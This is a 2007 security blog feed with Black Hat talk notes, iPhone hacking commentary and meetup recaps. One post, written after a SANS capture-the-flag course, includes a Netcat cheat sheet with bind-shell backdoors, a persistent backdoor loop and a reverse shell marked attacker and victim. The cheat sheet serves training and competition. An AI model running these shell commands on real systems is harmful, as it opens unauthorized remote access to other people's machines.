/><author><name>Alice</name><email>noreply@blogger.com</email></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://bp2.blogger.com/_3B_BHQVFJS0/RsfbDGVhaXI/AAAAAAAAAFE/b01suSnNqg8/s72-c/lame-spam.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;CkcCRHk-cSp7ImA9WB5VGUk.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-3618920479256960802</id><published>2007-08-12T12:32:00.000-05:00</published><updated>2007-08-12T12:34:25.759-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-08-12T12:34:25.759-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="meta-blogging" /><category scheme="http://www.blogger.com/atom/ns#" term="legal" /><category scheme="http://www.blogger.com/atom/ns#" term="defcon" /><category scheme="http://www.blogger.com/atom/ns#" term="job" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>Since Defcon...</title><content type="html">Sorry for the complete lack of updates from me since Defcon. I've had plenty to write up, share, and rant about (as is my wont), but I'm in somewhat of a tenuous circumstance regarding my blogging, so I figure better safe than sorry, and thus I'm keeping my comments to a minimum. Hopefully some of the other Minds will pick up the slack. 
We shall see.</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/3618920479256960802/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=3618920479256960802" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3618920479256960802?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/3618920479256960802?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/08/since-defcon.html" title="Since Defcon..." /><author><name>Scott J. Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;DEcASHc6eip7ImA9WB5WGUQ.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-8204060266968914124</id><published>2007-08-01T13:19:00.000-05:00</published><updated>2007-08-01T14:20:49.912-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-08-01T14:20:49.912-05:00</app:edited><title>BLACK HAT field report #2: Don't tell Joanna the virtualization rootkit's dead</title><content type="html">Thomas Ptacek &amp; Nate Lawson talk about how hypervisor rootkits work and why they are detectable, maybe even more so than kernel rootkits.&lt;br /&gt;Thomas and Nate created a hypervisor rootkit called 'Vitriol' for OS X (very similar to '&lt;a 
href="http://en.wikipedia.org/wiki/Blue_Pill_%28malware%29"&gt;BluePill&lt;/a&gt;' for Vista) to test their virtualization rootkit detection methods.  This all stems from a debate between them and Joanna Rutkowska that's been going on for a year.  Ultimately she didn't give them permission to try to detect 'BluePill' on stage, so here we find ourselves.&lt;br /&gt;'Vitriol' is similar but not identical to 'BluePill'; it's less weaponized and more of a proof of concept.  'BluePill' was made for the AMD architecture.  'Vitriol' doesn't hook the network, and has a less stealthy loader.&lt;br /&gt;After a 'Vitriol' vs. 'BluePill' comparison there was a discussion on the detection of virtualization in general: behavior or state changes introduced by hypervisors, and timing variations introduced by a hypervisor.  Virtualized malware can be detected by examining the cross section of the hypervisor vs. the OS and how much the hypervisor needs to exactly emulate the OS to remain undetected.&lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;Strategy One - Side channel Attacks&lt;br /&gt;VM overhead creates detectable 'trails' through microarchitecture that are hard to conceal.&lt;br /&gt;&lt;br /&gt;Strategy Two - Vantage point Attacks&lt;br /&gt;VM cross-section forces it to recognize and emulate the OS/hardware.&lt;br /&gt;Problem: Talk directly to the hardware (which will betray you), or emulate the hardware, &lt;span style="font-style: italic;"&gt;with perfect fidelity.&lt;br /&gt;&lt;/span&gt;Performance Event Counters: instructions retired, cache misses, branches, etc.&lt;br /&gt;HPET counters, ACPI timers, and MSRs would all need to agree for attackers to win.&lt;br /&gt;&lt;br /&gt;Strategy Three - Vulnerability attack&lt;br /&gt;Finding Hypervisor Bugs&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Conclusions: how to make it harder for attackers&lt;br /&gt;Introduce data-dependence (many heuristics)&lt;br /&gt;Force to emulate microarchitecture (branch buffers, etc)&lt;br 
/&gt;Force them to Emulate Obscure Features (HPET, PerfCounters, AGP GART)&lt;br /&gt;Tie them to a single architecture (Intel VT, Op Roms, etc.)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.matasano.com/log"&gt;www.matasano.com/log&lt;/a&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/8204060266968914124/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=8204060266968914124" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8204060266968914124?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8204060266968914124?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/08/black-hat-field-report-2-dont-tell.html" title="BLACK HAT field report #2: Don't tell Joanna the virtualization rootkit's dead" /><author><name>Sean V. 
Coyne</name><uri>http://www.blogger.com/profile/02193585641011296957</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="10452412905074994692" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;DEUASXwyeyp7ImA9WB5WGUQ.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-2430607122362543747</id><published>2007-08-01T12:21:00.000-05:00</published><updated>2007-08-01T14:24:08.293-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-08-01T14:24:08.293-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="black hat" /><title>Black Hat Field Report #1: Design Review of the Web - Kaminsky</title><content type="html">Dan Kaminsky takes a closer look at some interesting aspects of 'Web 2.0'.&lt;br /&gt;Using 'Slirpie' (back from the dead) VPN'ing into Protected Networks With Nothing But A Lured Web Browser.&lt;br /&gt;The fundamental design of the web is &lt;span style="font-style: italic;"&gt;late binding&lt;/span&gt;: pieces are pulled together and assembled at runtime, independent from one another.  So as soon as independence was established, people wanted to be able to create dependencies ("you read my page, I read your mail").&lt;br /&gt;DNS Pinning still works?&lt;br /&gt;Dan demonstrated an extension of RSnake that grants full IP connectivity, by design, to any attacker who can lure a web browser to render his page. This used to be taken care of by Same Origin Policy, which attempts to restrict scripting and other forms of enhanced access to sites with the same name.  
But scripts are not acquired from names, they come from addresses.&lt;br /&gt;Dan also demonstrates how Slirpie can cut through some implementations of Single Sign-on.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-2430607122362543747?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/2430607122362543747/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=2430607122362543747" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/2430607122362543747?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/2430607122362543747?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/08/black-hat-field-report-1-design-review.html" title="Black Hat Field Report #1: Design Review of the Web - Kaminsky" /><author><name>Sean V. 
Coyne</name><uri>http://www.blogger.com/profile/02193585641011296957</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="10452412905074994692" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CkUBR3szeyp7ImA9WB5WGUk.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-8957954470643004606</id><published>2007-07-31T23:32:00.000-05:00</published><updated>2007-07-31T22:50:56.583-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-07-31T22:50:56.583-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="challenge" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="education" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="howto" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>All the networking you could need: Netcat</title><content type="html">So my &lt;a href="http://sans.org/"&gt;SANS&lt;/a&gt; course this past week culminated today with a nice game of capture the flag. While not &lt;a href="http://www.defcon.org/"&gt;Defcon&lt;/a&gt; caliber it ended up being quite a lot of fun, especially for a game that could only last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing a scenario-based CTF brought it all together as many of them were used during the game. Mostly we focused on the old favorites: &lt;a href="http://insecure.org/nmap/"&gt;NMap&lt;/a&gt;, &lt;a href="http://www.nessus.org/"&gt;Nessus&lt;/a&gt;, &lt;a href="http://www.openwall.com/john/"&gt;John the Ripper&lt;/a&gt;; the kinda tools that have been around forever, and for good reason. &lt;br /&gt;&lt;br /&gt;We focused mainly on another tool, one I'd known but used little. 
Called the "network Swiss Army knife", &lt;a href="http://www.vulnwatch.org/netcat/"&gt;Netcat&lt;/a&gt; proved, as we were promised by &lt;a href="http://counterhack.net"&gt;Ed&lt;/a&gt;, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that; I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possibly remind some old hands of some fun tricks:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Data Transfer (Pull):&lt;/b&gt;&lt;br /&gt;&lt;i&gt;server:&lt;/i&gt; nc -l -p [port] &lt; [filename]&lt;br /&gt;&lt;i&gt;client:&lt;/i&gt; nc [server ip] [server port] &gt; [filename]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Data Transfer (Push):&lt;/b&gt;&lt;br /&gt;&lt;i&gt;server:&lt;/i&gt; nc -l -p [port] &gt; [filename]&lt;br /&gt;&lt;i&gt;client:&lt;/i&gt; nc [server ip] [server port] &lt; [filename]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Backdoors:&lt;/b&gt;&lt;br /&gt;&lt;i&gt;unix:&lt;/i&gt; nc -l -p [port] -e /bin/sh&lt;br /&gt;&lt;i&gt;windows:&lt;/i&gt; nc -l -p [port] -e cmd.exe&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Persistent Backdoor: &lt;/b&gt;&lt;br /&gt;while [ 1 ]; do nc -l -p [port] -e /bin/sh; done&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Reverse Shell&lt;/b&gt; &lt;br /&gt;&lt;i&gt;server (attacker):&lt;/i&gt; nc -l -p [port]&lt;br /&gt;&lt;i&gt;client (victim):&lt;/i&gt; nc [server ip] [server port] -e [shell] &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Backdoor Client:&lt;/b&gt; &lt;br /&gt;nc [server ip] [port]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Traffic Relay on Linux:&lt;/b&gt;&lt;br /&gt;mknod backpipe p&lt;br /&gt;nc -l -p [incoming port] 
0&lt;backpipe | nc [forward IP] [port] 1&gt;backpipe&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Traffic Replay:&lt;/b&gt;&lt;br /&gt;nc [targetip] [port] &lt; [filename]&lt;br /&gt;&lt;br /&gt;A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-8957954470643004606?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/8957954470643004606/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=8957954470643004606" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8957954470643004606?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8957954470643004606?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/07/all-networking-you-could-need-netcat.html" title="All the networking you could need: Netcat" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;CEQASXc7cSp7ImA9WB5WF0k.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-8424409773265673308</id><published>2007-07-29T14:31:00.000-05:00</published><updated>2007-07-29T15:52:28.909-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-07-29T15:52:28.909-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="meta-blogging" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="education" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="defcon" /><category scheme="http://www.blogger.com/atom/ns#" term="cons" /><title>At least we're learning</title><content type="html">I've spent the past few days taking the &lt;a href="http://www.sans.org/training/description.php?tid=243"&gt;SANS 504 course: Hacking Techniques, Exploits, and Incident Handling&lt;/a&gt;.  I was lucky enough to have the course creator, &lt;a href="http://www.counterhack.net/"&gt;Ed Skoudis&lt;/a&gt;, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.&lt;br /&gt;&lt;br /&gt;I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. 
A short update:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;I've been in training, busy at work, and abusing &lt;a href="http://pipes.yahoo.com/pipes/"&gt;Yahoo Pipes&lt;/a&gt;, something I'll write more about later.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Bacchus has stopped reading anything but &lt;a href="http://www.snort.org/"&gt;Snort&lt;/a&gt; alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;No one's really sure what Narc, GPmidi, Norris, or LogicX  have been doing, but that's prolly a good thing.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Saijak seems to have forgotten how to use a computer, though with good reason. &lt;/li&gt;&lt;/ul&gt;Regardless, we're all getting stoked for &lt;a href="http://www.defcon.org/"&gt;Defcon&lt;/a&gt; and various Minds will be making it out there Thursday and Friday. We'll be in the &lt;a href="http://www.rivierahotel.com/"&gt;Riviera&lt;/a&gt; and around various places. 
More about our plans to come.&lt;br /&gt;&lt;br /&gt;By the way check out Ed's &lt;a href="http://www.counterhack.net/Counter%20Hack/Challenges.html"&gt;incident handler challenges&lt;/a&gt;, fun stuff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-8424409773265673308?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/8424409773265673308/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=8424409773265673308" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8424409773265673308?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/8424409773265673308?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/07/at-least-were-learning.html" title="At least we're learning" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;A0cAQHs9fyp7ImA9WB5XEUw.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-4492450723321412795</id><published>2007-07-10T20:05:00.000-05:00</published><updated>2007-07-10T20:57:21.567-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-07-10T20:57:21.567-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="threat analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="webapps" /><category scheme="http://www.blogger.com/atom/ns#" term="reading" /><category scheme="http://www.blogger.com/atom/ns#" term="mobiles" /><category scheme="http://www.blogger.com/atom/ns#" term="apple" /><title>Another iPhone Security Perspective</title><content type="html">Alright, I promise, last iPhone post, at least from me.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The fine folks over at &lt;a href="http://www.symantec.com/enterprise/security_response/weblog/2007/07/iphone_redux.html"&gt;Symantec's Security Response group are apparently taking a look at the iPhone&lt;/a&gt; from a "Wouldn't it be fun to land malicious code on this" perspective and seem to have more confidence than I did initially (See: &lt;a href="http://blog.vulnerableminds.com/2007/06/iphone-sounds-alot-like-ipwn.html"&gt;iPhone sounds a lot like iPwn&lt;/a&gt;), and with good reason. It would seem that Apple hasn't been as cavalier with their AJAX/iPhone integration as early reports suggested. 
For now that seems like good reason, but as the iPhone gets opened up further and further, either by Apple or by intrepid hackers, that may change.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;So give the Symantec article a read, and enjoy your iPhone. We'll be coming for it soon...&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-4492450723321412795?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/4492450723321412795/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=4492450723321412795" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/4492450723321412795?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/4492450723321412795?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/07/another-iphone-security-perspective.html" title="Another iPhone Security Perspective" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CEMARns-fyp7ImA9WB5QF04.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-7263169620094809378</id><published>2007-07-06T08:32:00.000-05:00</published><updated>2007-07-06T09:34:07.557-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-07-06T09:34:07.557-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="os" /><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="development" /><category scheme="http://www.blogger.com/atom/ns#" term="reverse engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="hardware hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="lifehacks" /><category scheme="http://www.blogger.com/atom/ns#" term="wireless" /><category scheme="http://www.blogger.com/atom/ns#" term="mobiles" /><category scheme="http://www.blogger.com/atom/ns#" term="apple" /><title>iPh0n3: And so it begins...</title><content type="html">From &lt;a href="http://www.tuaw.com/2007/07/06/iphoneinterface-starts-to-crack-open-iphone/"&gt;TUAW&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;"iPhone enthusiasts over at the #iphone-talk and #iphone-mac channels on irc.osx86.hu have developed iPhoneInterface, a new Windows and Mac tool that allows you to manipulate the iPhone's state, launch services, and interact with the iPhone filesystem. 
With it, you'll be able to scan the iPhone file structure, create and remove folders, start iPhone services, and more."&lt;/blockquote&gt;&lt;br /&gt;I don't think anyone is really surprised that this happened. I know many people who believe that Apple actually encourages this type of behavior, evidenced by the ease of cracking into the &lt;a href="http://www.appletvhacks.net/"&gt;AppleTV&lt;/a&gt; and the numerous enhancements that followed. I don't know if I quite fall into that camp, but I do think it's inevitable that any closed system that gains interest from so many technically inclined people will not stay closed for long. I don't know if that's really a statement about security, or just common sense.&lt;br /&gt;&lt;br /&gt;Protection/hackability philosophy aside, I'm excited to see where this goes as I get ready to throw down my own $600 to Apple/AT&amp;amp;T. Take the already impressive iPhone, throw in a healthy helping of the great features you get in regular &lt;a href="http://www.apple.com/macosx/leopard/"&gt;OS X&lt;/a&gt;, and add in some of the features found in other high end phones, and you really have a be-all device. Truth be told I'd actually be reluctant to use such hacks on my main phone, but my real hope is that this kind of thing encourages Apple to open up the iPhone, add the features people have been asking for, and make it a lil hacking pad that I can also get email and make calls on.&lt;br /&gt;&lt;br /&gt;That being said I think SSH and the ability to browse the filesystem are a must, but how about a Python interpreter or something? Flash maybe? A Safari view source option? &lt;a href="http://macromates.com/"&gt;TextMate&lt;/a&gt; for iPhone? Are you listening Apple? 
I want to be able to play next year's CTF qualifier on the Metro.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-7263169620094809378?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/7263169620094809378/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=7263169620094809378" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7263169620094809378?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/7263169620094809378?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/07/iph0n3-and-so-it-begins.html" title="iPh0n3: And so it begins..." /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;D0UCRX47cCp7ImA9WB5QFk0.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-2191759676718517009</id><published>2007-07-04T21:11:00.000-05:00</published><updated>2007-07-04T22:14:24.008-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-07-04T22:14:24.008-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="legal" /><category scheme="http://www.blogger.com/atom/ns#" term="poc/code" /><title>Closure to Disclosure</title><content type="html">There's been a fair bit of discussion lately about disclosure policies of various groups and people in information security. This isn't new, or really a surprise; disclosure is something that comes up every few months, every conference, and other random times based on the alignment of Jupiter and Tim's hairstyle. I plan on throwing my opinion on various topics out there, but first I felt it would be most appropriate to make the &lt;a href="http://docs.google.com/View?docid=dd9wn9f5_8cm3bwn"&gt;Vulnerable Minds disclosure policy&lt;/a&gt; a matter of record. I admit we borrowed heavily from the fine folks at &lt;a href="http://www.matasano.com/log/mtso/ethics"&gt;Matasano Chargen&lt;/a&gt;, but after our own discussion, modification, and consideration we feel that this document represents the best way of handling vulnerabilities; for us, for vendors, and for the computing community as a whole. 
</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/2191759676718517009/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=2191759676718517009" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/2191759676718517009?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/2191759676718517009?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/07/closure-to-disclosure.html" title="Closure to Disclosure" /><author><name>Scott J. Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;D0IMR3k9cSp7ImA9WB5QEUg.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-782739496062306266</id><published>2007-06-29T16:31:00.000-05:00</published><updated>2007-06-29T17:19:46.769-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-06-29T17:19:46.769-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="capsec" /><category scheme="http://www.blogger.com/atom/ns#" term="networking" /><title>CapSec Recap</title><content type="html">As I posted at quite short notice, yesterday was the initial meeting of &lt;a 
href="http://citysec.org/forums/1/topics/17?page=1#posts-219"&gt;CapSec&lt;/a&gt;, the &lt;a href="http://citysec.org/"&gt;CitySec&lt;/a&gt; group of DC being started by Matasano Chargen member Dan Moniz. I'd corresponded back and forth with Dan a few times on the CitySec message board, so it was a pleasure to speak with him in person, as well as the other folks who showed up.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The meeting itself was small but definitely worthwhile and quite fun. I showed up at the Brickskeller around 7:20 and walked in to find a table set up with a small CapSec sign. I was the third person to make it, with the grand total rounding out to five. Low attendance? Perhaps, but we all had a great time anyway. It was an excellent opportunity to actually have a nice conversation, talk with everyone, get everyone's perspective, and I genuinely enjoyed everyone who showed up. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;What did we talk about you may ask? I have no idea, and that's what made it great. Everything from old jobs we've had, current trends, the iPhone, and what our favorite beers are. 
What was amazing was the connections that people put together throughout the night. I've always felt that the security community is small and tightly knit, and last night proved it. There were many "O I know those guys, we've hung out at &lt;name&gt;" moments. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;All in all it was a great experience. We work in an exciting and dynamic industry that's full of exciting and dynamic people. It's always fun to just get to hang out, be social, talk &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_12"&gt;infosec&lt;/span&gt;, and enjoy a couple nice drinks. So my many thanks to Dan for starting this group up, I know I'll be a regular attendee.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3647430684627927763-782739496062306266?l=blog.vulnerableminds.com'/&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/782739496062306266/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=782739496062306266" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/782739496062306266?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/782739496062306266?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/06/capsec-recap.html" title="CapSec Recap" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;AkEDSHwzfyp7ImA9WB5QEEg.&quot;"><id>tag:blogger.com,1999:blog-3647430684627927763.post-439042608796007959</id><published>2007-06-28T14:15:00.000-05:00</published><updated>2007-06-28T14:24:39.287-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2007-06-28T14:24:39.287-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="infosec" /><category scheme="http://www.blogger.com/atom/ns#" term="people" /><category scheme="http://www.blogger.com/atom/ns#" term="capsec" /><category scheme="http://www.blogger.com/atom/ns#" term="networking" /><title>CapSec Tonight!</title><content type="html">I don't know how I missed it considering my activity on &lt;a href="http://citysec.org"&gt;CitySec&lt;/a&gt;, but tonight, June 28, is the first meeting of the &lt;a href="http://citysec.org/forums/1/topics/17?page=1#posts-219"&gt;CapSec&lt;/a&gt; security meet up. The meeting will be at:&lt;br /&gt;&lt;p&gt;The Brickskeller&lt;br /&gt;Dining House and Down Home Saloon&lt;br /&gt;1523 22nd St, 